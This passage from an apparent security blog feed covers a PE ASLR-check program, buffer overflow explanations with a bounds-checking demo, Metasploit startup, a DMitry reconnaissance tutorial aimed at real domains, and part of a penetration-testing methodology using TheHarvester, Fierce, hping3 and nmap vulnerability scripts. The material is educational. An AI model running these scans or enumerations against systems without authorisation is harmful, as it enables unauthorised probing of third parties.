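    int rc = pe_read_flags(buf, len, &f);
    if (rc != PE_OK) return rc;
    return (f.dll_chars & PE_DYNAMIC_BASE) && !(f.file_chars & PE_RELOCS_STRIPPED);
}

/* Constructed sample header (not a real module): PE32+ with the given flags. */
size_t make_sample_pe(uint8_t *buf, size_t cap, uint16_t file_chars, uint16_t dll_chars)
{
    const size_t pe_off = 0x80, total = pe_off + 4 + 20 + 240;
    if (cap < total) return 0;
    memset(buf, 0, total);
    buf[0] = 'M'; buf[1] = 'Z';
    buf[0x3C] = (uint8_t)pe_off;
    memcpy(buf + pe_off, "PE\0\0", 4);
    uint8_t *coff = buf + pe_off + 4;
    coff[0] = 0x64; coff[1] = 0x86;                 /* Machine: AMD64 */
    coff[16] = 240;                                 /* SizeOfOptionalHeader */
    coff[18] = (uint8_t)file_chars; coff[19] = (uint8_t)(file_chars >> 8);
    uint8_t *opt = coff + 20;
    opt[0] = 0x0b; opt[1] = 0x02;                   /* magic 0x20b (PE32+) */
    opt[70] = (uint8_t)dll_chars; opt[71] = (uint8_t)(dll_chars >> 8);
    return total;
}

int main(void)
{
    uint8_t img[512];
    /* Constructed inventory: file names and flag combinations are made up. */
    const struct { const char *name; uint16_t fc, dc; } samples[] = {
        { "hardened.dll",      0x2022, PE_HIGH_ENTROPY_VA | PE_DYNAMIC_BASE | PE_NX_COMPAT },
        { "legacy-plugin.dll", 0x2022, 0 },
        { "stripped.dll",      0x2023, PE_DYNAMIC_BASE | PE_NX_COMPAT },
    };
    for (size_t i = 0; i < sizeof samples / sizeof samples[0]; i++) {
        size_t n = make_sample_pe(img, sizeof img, samples[i].fc, samples[i].dc);
        printf("%-20s ASLR opt-in: %s\n", samples[i].name,
               pe_uses_aslr(img, n) == 1 ? "yes" : "NO");
    }
    return 0;
}
```

Run over the modules an application actually loads, a check like this lists the ones that still sit at a fixed address and therefore need an update or a forced-relocation policy.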
<h2>
A never-ending war</h2>
The world of exploitation and mitigation techniques is one of cat and
mouse. Powerful protective systems such as ASLR and NX raise the bar
for taking advantage of flaws and together have put the days of the
simple stack buffer overflow behind us, but smart attackers can still
combine multiple flaws to defeat these protections.<br />
The escalation continues. Microsoft's <a href="https://support.microsoft.com/en-us/kb/2458544">EMET</a>
("Enhanced Mitigation Experience Toolkit") includes a range of
semi-experimental protections that try to detect heap spraying or
attempts to call certain critical functions in ROP-based exploits. But
in the continuing digital arms war, even these security techniques have
been defeated. This doesn't make them useless—the difficulty
(and hence cost) of exploiting flaws goes up with each new mitigation
technique—but it's a reminder of the need for constant vigilance.</div>
</section></div>
BlackBarbie-bbhttp://www.blogger.com/profile/03407685720956138113noreply@blogger.com4tag:blogger.com,1999:blog-4509349481580895365.post-36232532745462004612015-08-27T10:34:00.000+05:302015-08-27T10:34:08.897+05:30What is Buffer Overflow ?<div dir="ltr" style="text-align: left;" trbidi="on">
Hi friends<br />
<br />
If you have been wondering what a buffer overflow is, here is the explanation for your hungry minds.<br />
<br />
What is a buffer overflow?<br />
<br />
<span class="_Tgc">Heap <b>Overflow Attacks</b>. Programs use
dynamically allocated memory as well as the stack. A vulnerable program
uses a call to something like strcpy to copy input into a <b>buffer</b>, allocated on the heap.</span><br />
<br />
<br />
Source : <a href="http://security.stackexchange.com/questions/53878/how-to-explain-buffer-overflow-to-a-layman" rel="nofollow" target="_blank">Security Stackexchange</a><br />
<br />
It sounds too technical. I'm a beginner, how can I understand it?<br />
<br />
<div class="post-text" itemprop="text">
Imagine you have a list of people you owe money to.<br />
<img alt="Name | Amount owing" src="http://i.stack.imgur.com/uZ68n.png" /><br />
Also, you have a weird pen with built-in correction fluid, so that if
you write something in a particular place, and then write something
else, it erases the first thing you wrote. This is how computer memory
works, which is a bit different from how writing normally works.<br />
You pay someone a $500 deposit on a $5000 car, so you now owe them
$4500. They tell you their name is John Smith. You write the amount
(4500) and the name (John Smith) in the table. Your table now looks like
this:<br />
<img alt="John Smith | 4500" src="http://i.stack.imgur.com/yXv9A.png" /><br />
Later your table reminds you to pay them back. You pay the $4500
(plus interest) and erase it from the table, so now your table is blank
again.<br />
Then you get a $1000 loan from someone else. They tell you their name
is "John Smithxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx9999999999".
You write the amount (1000) and the name (John
Smithxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx9999999999) in your table. Your
table now looks like this:<br />
<img alt="John Smithxxxxxxxxxxxxxxxxxxxxxxx|x99999999990" src="http://i.stack.imgur.com/3qpC5.png" /><br />
(the last 0 from 1000 was not written over. This is unimportant.)<br />
When writing the name, you didn't stop when you got to the end of the
"name" column, and kept writing into the "amount owing" column! This is
a buffer overflow.<br />
Later, your table reminds you that you owe $99999999990 to John
Smithxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx. You find him again and pay him
almost 100 billion dollars.<br />
<br />
<br />
This is pretty simple to explain if you understand it well enough.
Just make sure you hit on the important background. More or less in this
order:<br />
<ul>
<li>The "stack" is a place where you can store temporary information.
The "stack pointer" determines where the end of the stack is. When a
function runs, it moves the stack pointer to give itself memory to work
with, and when it's done, it moves the pointer back where it found it.</li>
<li>The stack grows backwards. So to give yourself 100 bytes on the stack, you <em>subtract</em>
100 from the stack pointer rather than adding it. If the previous
function's stack started at 1000 and I want 100 bytes, then my stack
starts at 900.</li>
<li>This means that if you use more space than you gave yourself, you
won't just continue writing out into empty space, you'll actually start
<em>overwriting</em> previous stack values.</li>
<li>When my function starts, the very top value left on the stack for me by the previous function is the <em>return address</em> where I should go when my function is done.</li>
<li>This means that if my function overruns its stack, the <em>very first thing</em>
that it's going to overwrite is the return address. If the attacker is
careful about what he fills the stack with, he can specify whatever
return address he wants.</li>
<li>When my function exits, whatever code is at that return address is what will get executed next.</li>
</ul>
<h1>
Simple Example</h1>
In <a href="http://insecure.org/stf/smashstack.html">Smashing the Stack for Fun and Profit</a>,
where this technique was originally described, the most simple and
straight-forward technique was introduced. Imagine the function reads
your name and then returns. So your stack looks like this:<br />
<pre><code>Stack Pointer                                     Prev. Stack Ptr
+----------------------------------+--------------+................
| Your Name Here                   | Return Addr  | Old stack ...
+----------------------------------+--------------+................
</code></pre>
But the bad guy makes his name long enough to overflow the space. And
not only that, instead of typing a real name, he types in some Evil
Code, some padding, and the address of that Evil Code.<br />
<pre><code>+----------------------------------+--------------+................
| [ Evil Code ]xxxxxxxxxxxxxxxxxxxxxxEvil Address | Old stack ...
+----------------------------------+--------------+................
  ▲──────────────────────────────────┘
</code></pre>
Now instead of returning back to the previous caller, you jump straight to the <code>[Evil Code]</code>. Now you're running his code instead of your program. From there it's pretty much game-over.<br />
<h1>
Mitigation and Other Techniques</h1>
Two of the techniques used to reduce the effectiveness of stack smashing are DEP and ASLR. <br />
DEP ("Data Execution Prevention") works by marking the stack non-executable. This means that the <code>[Evil Code]</code>
on the stack won't run, because running code on the stack is no longer
allowed. To get around this, the attacker finds chunks of existing code
that will do bits and pieces of what he wants. And instead of just
overwriting his own return address, he creates a chain of return
addresses down through the stack for all the functions he wants to run
in turn. They call this "Return Oriented Programming", or ROP. The chain
of returns is called a "ROP Chain". This is really hard to do. But
there are tools to help.<br />
ASLR ("Address Space Layout Randomization") works by randomizing the
locations of all the interesting functions. Now creating a ROP chain
isn't so easy -- every time the program runs, all the addresses are in
different places. So when the attacker goes to overwrite the return
address with his own Evil Address, he won't know what numbers to use
because the code is always in different places.<br />
Neither DEP nor ASLR on its own offers much protection, but both together make successful exploitation <em>very</em> difficult. While some circumventions sometimes exist, there isn't a workaround that works <em>everywhere</em>. If you can get around DEP+ASLR, it's a one-off sort of success.</div>
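The ledger analogy above, as an added C example that is not part of the original answers: one table row is a byte array whose name column sits directly before the amount column, an unchecked copy lets a long name change the amount, and a length check refuses it. The column widths, the sample name and all function names are constructed for this demo.

```c
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

/* One table row, laid out like the ledger in the analogy: the name column is
 * immediately followed by the amount column. Widths are constructed. */
#define NAME_W   16
#define AMOUNT_W 11
#define ROW_SIZE (NAME_W + AMOUNT_W)

/* Constructed input: 10 name characters, 6 filler characters that use up the
 * rest of the name column, then 10 digits that land in the amount column. */
#define LONG_NAME "John Smithxxxxxx9999999999"

void row_clear(unsigned char *row) { memset(row, ' ', ROW_SIZE); }

/* Write the amount right-aligned in its column. Returns -1 if it does not fit. */
int write_amount(unsigned char *row, long long amount)
{
    char tmp[32];
    int n = snprintf(tmp, sizeof tmp, "%*lld", AMOUNT_W, amount);
    if (n != AMOUNT_W) return -1;
    memcpy(row + NAME_W, tmp, AMOUNT_W);
    return 0;
}

/* Read the amount column back as a number, the way the table "reminds" you. */
long long read_amount(const unsigned char *row)
{
    char tmp[AMOUNT_W + 1];
    memcpy(tmp, row + NAME_W, AMOUNT_W);
    tmp[AMOUNT_W] = '\0';
    return strtoll(tmp, NULL, 10);
}

/* The bug: the copy length comes from the input, not from the column width.
 * The clamp to ROW_SIZE exists only so this demo stays inside its own array;
 * strcpy() into a real buffer has no such limit. */
size_t write_name_unchecked(unsigned char *row, const char *name)
{
    size_t n = strlen(name);
    if (n > ROW_SIZE) n = ROW_SIZE;
    memcpy(row, name, n);
    return n;
}

/* The fix: compare the input length with the destination size before copying,
 * and refuse oversized input instead of silently truncating it. */
int write_name_checked(unsigned char *row, const char *name)
{
    size_t n = strlen(name);
    if (n > NAME_W) return -1;
    memcpy(row, name, n);
    return 0;
}

int main(void)
{
    unsigned char row[ROW_SIZE];

    row_clear(row);
    write_amount(row, 1000);
    write_name_checked(row, "John Smith");
    printf("normal name    : [%.*s] owes %lld\n",
           ROW_SIZE, (const char *)row, read_amount(row));

    row_clear(row);
    write_amount(row, 1000);
    write_name_unchecked(row, LONG_NAME);
    printf("unchecked write: [%.*s] owes %lld\n",
           ROW_SIZE, (const char *)row, read_amount(row));

    row_clear(row);
    write_amount(row, 1000);
    int rc = write_name_checked(row, LONG_NAME);
    printf("checked write  : rc=%d, owes %lld\n", rc, read_amount(row));
    return 0;
}
```

On a real stack the field that follows the buffer is the saved return address rather than an amount, which is why the same missing length check redirects execution instead of changing a number.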
<div class="post-text" itemprop="text">
<br />
<br />
<br />
Here's an analogy that isn't the most technically accurate, but it should get the idea across.
<br />
Picture a recipe book on 3-hole punch paper in a binder (memory) and a very dumb cook (the processor, i.e. the CPU).<br />
<ul>
<li>People can add or remove pages from the binder (load or unload programs and data in memory)</li>
<li>The cook just follows every instruction on the page they're on</li>
<li>The cook starts at the beginning (bootloader) and continues on until the instruction is "close book"
<ul>
<li>Even if the instruction is to flip to another page (Turn to page 394)</li>
</ul>
</li>
</ul>
So, normally, you'd write on page one "Turn to page 200 (waffles)",
open up the binder, and put in waffles at page 200. Then have the cook
start - the cook should make waffles!<br />
But wait... there's an attacker! They've written notes in the
margins of your waffle recipe (outside the buffer) - and the cook
executes those instructions even though they're obviously handwritten.<br />
The cook was never told to only do what's printed on the original
sheet (in the normal buffer space) - the cook will also do anything
after that (in memory after the buffer).<br />
Perhaps the cook adds vinegar to the waffles (corrupts your files).
Perhaps the cook turns to page three hundred and ninety four and just
leaves the raw egg sitting there, unused, until it rots and molds (turns
off your antivirus). Perhaps the cook throws away everything in the
kitchen (deletes all your files), or puts a lock on your kitchen door to
keep you out (ransomware), or opens the window (installs a
trojan/backdoor) so the attacker can climb in the window.<br />
<br />
<br />
<br />
Hope this clarifies how a buffer overflow works.<br />
<br />
</div>
</div>
BlackBarbie-bbhttp://www.blogger.com/profile/03407685720956138113noreply@blogger.com2tag:blogger.com,1999:blog-4509349481580895365.post-11226844861154015762015-08-27T10:23:00.000+05:302015-08-27T10:23:09.327+05:30Starting Metasploit in kali linux 2.0<div dir="ltr" style="text-align: left;" trbidi="on">
Hi friends<br />
<br />
If you have been wondering how to start Metasploit on Kali Linux 2.0, here are the steps:<br />
<br />
<blockquote class="tr_bq">
# Start the PostgreSQL database<br />
/etc/init.d/postgresql start<br />
<br />
# Initialize the Metasploit Framework database<br />
msfdb init<br />
<br />
# Run msfconsole<br />
msfconsole</blockquote>
<br />
Hope it helps. </div>
BlackBarbie-bbhttp://www.blogger.com/profile/03407685720956138113noreply@blogger.com6tag:blogger.com,1999:blog-4509349481580895365.post-8657700044529198922015-08-27T10:09:00.001+05:302015-08-27T10:09:39.053+05:30Dmitry kali Linux Tutorial<div dir="ltr" style="text-align: left;" trbidi="on">
Hi friends<br />
<br />
Here is a tutorial for DMitry on Kali Linux.<br />
<br />
<div dir="ltr" style="text-align: left;">
<div class="MsoNoSpacing">
<b>Intro</b> - DMitry (Deepmagic Information Gathering Tool) is a UNIX/(GNU)Linux Command Line Application coded in C language.</div>
<div class="MsoNoSpacing">
DMitry
has the ability to gather as much information as possible about a host.
Base functionality is able to gather possible subdomains, email
addresses, uptime information, TCP port scan results, whois lookups, and more.
The information is gathered with the following methods:</div>
<ul>
<li>Perform an Internet Number whois lookup.</li>
<li>Retrieve possible uptime data, system and server data.</li>
<li>Perform a SubDomain search on a target host.</li>
<li>Perform an E-Mail address search on a target host.</li>
<li>Perform a TCP Portscan on the host target.</li>
<li>A Modular program allowing user specified modules</li>
</ul>
<div class="MsoNoSpacing">
<br /></div>
<div class="MsoNoSpacing">
1. How to open dmitry</div>
<div class="MsoNoSpacing">
A. GUI Method</div>
<div class="MsoNoSpacing">
</div>
<div class="MsoNoSpacing">
Application → Kali Linux → Information gathering → Live Host Identification → dmitry</div>
<div class="separator" style="clear: both; text-align: center;">
<a href="http://4.bp.blogspot.com/-g7ClTW70LJc/UePNDskP2BI/AAAAAAAAA-g/aD_vemc_Z1k/s1600/1.JPG" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="218" src="http://4.bp.blogspot.com/-g7ClTW70LJc/UePNDskP2BI/AAAAAAAAA-g/aD_vemc_Z1k/s400/1.JPG" width="400" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="MsoNoSpacing">
B. Open a terminal, type dmitry and hit Enter</div>
<div class="separator" style="clear: both; text-align: center;">
<a href="http://2.bp.blogspot.com/-KV6o502VU1M/UePNH7Hxg3I/AAAAAAAAA-0/YIPTWHyvKx8/s1600/1B.JPG" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="178" src="http://2.bp.blogspot.com/-KV6o502VU1M/UePNH7Hxg3I/AAAAAAAAA-0/YIPTWHyvKx8/s400/1B.JPG" width="400" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="MsoNoSpacing">
2. <b>-i</b>
– This command is used to perform a whois lookup on the IP address of a
host. If we only know the host name, dmitry will find the IP for us.</div>
<div class="MsoNoSpacing">
Syntax – <code>dmitry -i IP address</code></div>
<div class="separator" style="clear: both; text-align: center;">
</div>
<div class="MsoNoSpacing">
Ex – <code>dmitry -i 192.168.71.128</code></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="http://3.bp.blogspot.com/-_rxq2KBXHec/UePNIZUAN0I/AAAAAAAAA-8/Zhn2XkKo1Yk/s1600/2A.JPG"><img border="0" height="271" src="http://3.bp.blogspot.com/-_rxq2KBXHec/UePNIZUAN0I/AAAAAAAAA-8/Zhn2XkKo1Yk/s320/2A.JPG" width="400" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="MsoNoSpacing">
3. <b>-w</b> – This command is used to perform a whois lookup on the domain name of a host. </div>
<div class="MsoNoSpacing">
Syntax – <code>dmitry -w domain</code></div>
<div class="separator" style="clear: both; text-align: center;">
</div>
<div class="MsoNoSpacing">
Ex – <code>dmitry -w facebook.com</code></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="http://1.bp.blogspot.com/-O5T7tbIHrAg/UePNMh6CSgI/AAAAAAAAA_M/hJX_Hq06MlE/s1600/3.JPG" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="313" src="http://1.bp.blogspot.com/-O5T7tbIHrAg/UePNMh6CSgI/AAAAAAAAA_M/hJX_Hq06MlE/s400/3.JPG" width="400" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="MsoNoSpacing">
4. <b>-s</b> – This command is used to perform a search for possible subdomains.</div>
<div class="MsoNoSpacing">
Syntax – <code>dmitry -s domain</code></div>
<div class="separator" style="clear: both; text-align: center;">
</div>
<div class="MsoNoSpacing">
Ex – <code>dmitry -s alexa.com</code></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="http://2.bp.blogspot.com/-U2pMMbPi35Y/UePNQCU06jI/AAAAAAAAA_c/stZe-WEZNc8/s1600/4.JPG" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="171" src="http://2.bp.blogspot.com/-U2pMMbPi35Y/UePNQCU06jI/AAAAAAAAA_c/stZe-WEZNc8/s400/4.JPG" width="400" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="MsoNoSpacing">
5. <b>-p</b> – This command is used to perform a TCP port scan on a host.</div>
<div class="MsoNoSpacing">
Syntax – <code>dmitry -p IP address</code></div>
<div class="separator" style="clear: both; text-align: center;">
</div>
<div class="MsoNoSpacing">
Ex – <code>dmitry -p 192.168.71.128</code></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="http://4.bp.blogspot.com/-YmiM4fVauuI/UePNLnVaf1I/AAAAAAAAA_E/vksTdPTBGkI/s1600/5.JPG" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="236" src="http://4.bp.blogspot.com/-YmiM4fVauuI/UePNLnVaf1I/AAAAAAAAA_E/vksTdPTBGkI/s400/5.JPG" width="400" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="MsoNoSpacing">
6. <b>-f</b>
– This command is used to perform a TCP port scan on a host showing
output reporting filtered ports (useful if there is a firewall in
place). For this command to run successfully, <b>-p</b> must also be set.</div>
<div class="MsoNoSpacing">
Syntax – <code>dmitry -pf domain</code></div>
<div class="separator" style="clear: both; text-align: center;">
</div>
<div class="MsoNoSpacing">
Ex – <code>dmitry -pf google.com</code></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="http://1.bp.blogspot.com/-0ahd_UK-y4E/UePNP9mW40I/AAAAAAAAA_Y/6-aEugz6CKA/s1600/6.JPG" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="325" src="http://1.bp.blogspot.com/-0ahd_UK-y4E/UePNP9mW40I/AAAAAAAAA_Y/6-aEugz6CKA/s400/6.JPG" width="400" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="MsoNoSpacing">
7. <b>-b</b>
– This command is used to report the banner received from a
scanned port (note that this only works if the port sends us a banner
when scanned). For this command to run successfully, <b>-p</b> must also be set.</div>
<div class="MsoNoSpacing">
Syntax – <code>dmitry -pb IP address</code></div>
<div class="separator" style="clear: both; text-align: center;">
</div>
<div class="MsoNoSpacing">
Ex – <code>dmitry -pb 192.168.71.128</code></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="http://3.bp.blogspot.com/-iKEhe7KWRh0/UePNSUNL2ZI/AAAAAAAAA_o/my3b-xlayds/s1600/7.JPG" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="236" src="http://3.bp.blogspot.com/-iKEhe7KWRh0/UePNSUNL2ZI/AAAAAAAAA_o/my3b-xlayds/s400/7.JPG" width="400" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="MsoNoSpacing">
8. <b>-e</b> – This command is used to perform a search for possible email addresses.</div>
<div class="MsoNoSpacing">
Syntax – <code>dmitry -e domain</code></div>
<div class="separator" style="clear: both; text-align: center;">
</div>
<div class="MsoNoSpacing">
Ex – <code>dmitry -e facebook.com</code></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="http://4.bp.blogspot.com/-0l44yJpLW7A/UePNXmFxV0I/AAAAAAAAA_8/f9If64IzoK0/s1600/7a.JPG" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="143" src="http://4.bp.blogspot.com/-0l44yJpLW7A/UePNXmFxV0I/AAAAAAAAA_8/f9If64IzoK0/s400/7a.JPG" width="400" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="MsoNoSpacing">
9. <b>-n</b> – This command is used to give us Netcraft.com information on a host.</div>
<div class="MsoNoSpacing">
Syntax – <code>dmitry -n domain</code></div>
<div class="separator" style="clear: both; text-align: center;">
</div>
<div class="MsoNoSpacing">
Ex – <code>dmitry -n alexa.com</code></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="http://1.bp.blogspot.com/-2RRcL0A_d7Y/UePNSrKI26I/AAAAAAAAA_s/kdf7muWfEeo/s1600/7b.JPG" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="195" src="http://1.bp.blogspot.com/-2RRcL0A_d7Y/UePNSrKI26I/AAAAAAAAA_s/kdf7muWfEeo/s400/7b.JPG" width="400" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="MsoNoSpacing">
10. <b>-o</b>
– This command is used to save the output to a file. The default
name is host.txt, but you can name it anything you want.</div>
<div class="MsoNoSpacing">
Syntax – <code>dmitry -s domain -o filename</code></div>
<div class="MsoNoSpacing">
Ex – <code>dmitry -s google.com -o filename</code> </div>
<div class="separator" style="clear: both; text-align: center;">
</div>
<div class="MsoNoSpacing">
Here, <b>-s</b> is just one example; you can use the other commands as well and save their output to a text file. Replace filename with a name of your choice.</div>
<div class="separator" style="clear: both; text-align: center;">
<a href="http://4.bp.blogspot.com/-hANDLV9zDJ8/UePNUtdXskI/AAAAAAAAA_0/kRLKTmCR2BI/s1600/8.JPG" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="216" src="http://4.bp.blogspot.com/-hANDLV9zDJ8/UePNUtdXskI/AAAAAAAAA_0/kRLKTmCR2BI/s400/8.JPG" width="400" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="MsoNoSpacing">
11. Here we are going to run some useful commands together.</div>
<div class="separator" style="clear: both; text-align: center;">
<a href="http://3.bp.blogspot.com/-DnckyyAaAqg/UePNC-KXnrI/AAAAAAAAA-c/QsFU_gqPoeU/s1600/11.JPG" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="340" src="http://3.bp.blogspot.com/-DnckyyAaAqg/UePNC-KXnrI/AAAAAAAAA-c/QsFU_gqPoeU/s400/11.JPG" width="400" /></a></div>
<div style="text-align: center;">
<a href="http://4.bp.blogspot.com/-enWF1wWPeBU/UePM8yLiGqI/AAAAAAAAA-M/GHnsjz_Irio/s1600/12.JPG" style="margin-left: 1em; margin-right: 1em; text-align: center;"><img border="0" height="216" src="http://4.bp.blogspot.com/-enWF1wWPeBU/UePM8yLiGqI/AAAAAAAAA-M/GHnsjz_Irio/s400/12.JPG" width="400" /></a></div>
<div style="text-align: center;">
<a href="http://1.bp.blogspot.com/-bfcaMp3M_7I/UePM_Sa0Y0I/AAAAAAAAA-U/ekZgVnnHaHI/s1600/13.JPG" style="margin-left: 1em; margin-right: 1em; text-align: center;"><img border="0" height="188" src="http://1.bp.blogspot.com/-bfcaMp3M_7I/UePM_Sa0Y0I/AAAAAAAAA-U/ekZgVnnHaHI/s400/13.JPG" width="400" /></a></div>
<div style="text-align: center;">
<a href="http://4.bp.blogspot.com/-7dkkO55pOO4/UePNEuWzxdI/AAAAAAAAA-s/gKqbTJVc1SQ/s1600/14.JPG" style="margin-left: 1em; margin-right: 1em; text-align: center;"><img border="0" height="186" src="http://4.bp.blogspot.com/-7dkkO55pOO4/UePNEuWzxdI/AAAAAAAAA-s/gKqbTJVc1SQ/s400/14.JPG" width="400" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
<i><b><span style="font-size: xx-small;">Hope you liked it stay tuned for more updates :) </span></b></i></div>
</div>
</div>
BlackBarbie-bbhttp://www.blogger.com/profile/03407685720956138113noreply@blogger.com33tag:blogger.com,1999:blog-4509349481580895365.post-71255245929861476952015-08-27T10:02:00.001+05:302015-08-27T10:02:08.772+05:30Pentesting Methodology Tutorial part -3<div dir="ltr" style="text-align: left;" trbidi="on">
Hi friends<br />
<br />
Welcome to the third part of the tutorial:<br />
<br />
<h3>
Planning</h3>
We begin in the planning phase of our methodology. If you are working
on a larger engagement and need a collaborative solution then Dradis is
the tool of choice. It provides capabilities for centralized
documentation, team collaboration, and most importantly the ability to
import information from our various tools within Kali. There are two
versions of Dradis: a community version and a commercial version. As you
can guess the version on Kali is the community version.<br />
Let's run through a quick example and fire up Dradis to create our
project structure. When you first launch Dradis you will be greeted with
an initialization screen. Give the server a password and select the
option to create a new project.<br />
<img alt="dradis" src="http://blog.terraverdeservices.com/hs-fs/hub/319268/file-2548128991-png/Blog_Images/dradis.png?t=1440522756112&width=600" style="display: block; margin-left: auto; margin-right: auto; width: 600px;" width="600" /><br />
Once you login with no username and the server password you will be
dropped into the Dradis framework console. From there we will implement
our penetration testing methodology and plan by adding branches and
notes. Since we have a lot to cover I will leave it up to the reader to
research more on Dradis.<br />
Within a few minutes we have mapped out our project tasks, Rules of Engagement, objectives, and remaining methodology steps.<br />
<img alt="scope" src="http://blog.terraverdeservices.com/hs-fs/hub/319268/file-2548129001-png/Blog_Images/scope.png?t=1440522756112&width=600" style="display: block; margin-left: auto; margin-right: auto; width: 600px;" width="600" /><br />
Dradis is a great tool, but don’t expect it to be a full-fledged
project management suite. If you need more firepower don’t forget that
Kali has a number of pre-installed applications such as Ruby and MySQL.
With this in mind you’re a few steps away from setting up Redmine to add
resource planning and Gantt charts to your Kali instance.<br />
Now that we have our project planning and documentation mechanism in
place we can move on to the next phase of the penetration testing
methodology and that's discovery.<br />
<h3>
Discovery</h3>
We decide to kick-off the Discovery phase by running TheHarvester.
TheHarvester is written by Christian and allows us to collect
information about a target organization from a variety of sources
including Google, Facebook, LinkedIn, spoke, etc. Let’s take a closer
look at TheHarvester.<br />
<img alt="theharvester1" src="http://blog.terraverdeservices.com/hs-fs/hub/319268/file-2568862965-png/Blog_Images/theharvester1.png?t=1440522756112&width=596" style="display: block; margin-left: auto; margin-right: auto; width: 596px;" width="596" /><br />
The screenshot shows TheHarvester options and some example usage. In
the next example we'll run TheHarvester against our target domain
querying Bing. We also want to ensure we limit our return results to
100. The command and its output would look something like:<br />
<img alt="theharvester2" src="http://blog.terraverdeservices.com/hs-fs/hub/319268/file-2562398114-png/Blog_Images/theharvester2.png?t=1440522756112&width=589" style="display: block; margin-left: auto; margin-right: auto; width: 589px;" width="589" /><br />
With these options selected TheHarvester will query Bing for our
domain looking for email addresses as well as additional linked domains.
The -n -t options tell TheHarvester to perform reverse DNS lookups on
the IP range identified for the domain queried as well as expand the
search for our domain across all top level domains. For example, if our
domain was nbc.com it would attempt to find domains such as nbc.ca,
nbc.biz, etc.<br />
TheHarvester can pull together a significant amount of information
that we can use during the scanning phase of Discovery, but in this case
we decide to utilize some additional tools to further our Information
Gathering efforts prior to moving on to scanning.<br />
At this point we decide that we want to interrogate DNS a bit more
with the information gathered from TheHarvester. Because of its features
we have chosen to run our domains through Fierce. Fierce can initiate
DNS zone transfer attempts as well as perform bruteforce lookups against
DNS. While TheHarvester can perform DNS bruteforcing as well, Fierce
contains added functionality and more granular options such as
controlling the number of threads used for execution. Here are the
Fierce options along with the output from our target domain. Please note
that the output here may not be ideal given our test domain that we are
using for this example.<br />
<img alt="theharvester3" src="http://blog.terraverdeservices.com/hs-fs/hub/319268/file-2562398124-png/Blog_Images/theharvester3.png?t=1440522756112&width=589" style="display: block; margin-left: auto; margin-right: auto; width: 589px;" width="589" /><br />
With this information in hand we can now import the output from the
tools into Dradis and move on to scanning, enumerating services, and
vulnerability identification.<br />
Once we have completed Information Gathering we need to start
enumerating discovered networks and services. Kali again saves the day
by giving us all the tools we need in one location. While in the normal
course of our engagements we would turn to nmap, we wanted to cover a
couple of other lesser-known scanners starting with fping and hping3.<br />
Using our case study, now that we have discovered hosts within our
domain, we will utilize fping to identify systems on our target network.<br />
<img alt="theharvester4" src="http://blog.terraverdeservices.com/hs-fs/hub/319268/file-2568862975-png/Blog_Images/theharvester4.png?t=1440522756112&width=600" style="display: block; margin-left: auto; margin-right: auto; width: 600px;" width="600" /><br />
Based on the output of fping we know that ICMP is enabled and that we
were able to enumerate our target network. Now we select one of our
hosts and perform a SYN scan with hping3.<br />
<img alt="theharvester5" src="http://blog.terraverdeservices.com/hs-fs/hub/319268/file-2562398164-png/Blog_Images/theharvester5.png?t=1440522756112&width=600" style="display: block; margin-left: auto; margin-right: auto; width: 600px;" width="600" /><br />
Using our list of services we can run nmap against the open ports to identify operating system and service versions.<br />
<img alt="theharvester6" src="http://blog.terraverdeservices.com/hs-fs/hub/319268/file-2562398179-png/Blog_Images/theharvester6.png?t=1440522756112&width=600" style="display: block; margin-left: auto; margin-right: auto; width: 600px;" width="600" /><br />
Next we are going to leverage nmap's vulnerability scanner to check
for SMB vulnerabilities on this host. First, let's quickly look at
nmap's scripting parameters.<br />
<img alt="theharvester7" src="http://blog.terraverdeservices.com/hs-fs/hub/319268/file-2562398174-png/Blog_Images/theharvester7.png?t=1440522756112&width=600" style="display: block; margin-left: auto; margin-right: auto; width: 600px;" width="600" /><br />
If you are interested you can take a look at the scripts supplied
with nmap. On Kali you can find them in /usr/share/nmap/scripts. After
doing a bit of searching we come across smb-check-vulns.<br />
<img alt="theharvester8" src="http://blog.terraverdeservices.com/hs-fs/hub/319268/file-2562398149-png/Blog_Images/theharvester8.png?t=1440522756112&width=600" style="display: block; margin-left: auto; margin-right: auto; width: 600px;" width="600" /><br />
After looking at nmap's documentation we find that this script can be
used to identify vulnerability conditions with SMB. We also learn that
we need to supply an unsafe flag to get it to fully run our scan. With
the consequences in mind and, more importantly, permission to impact
system availability, we run our scan.<br />
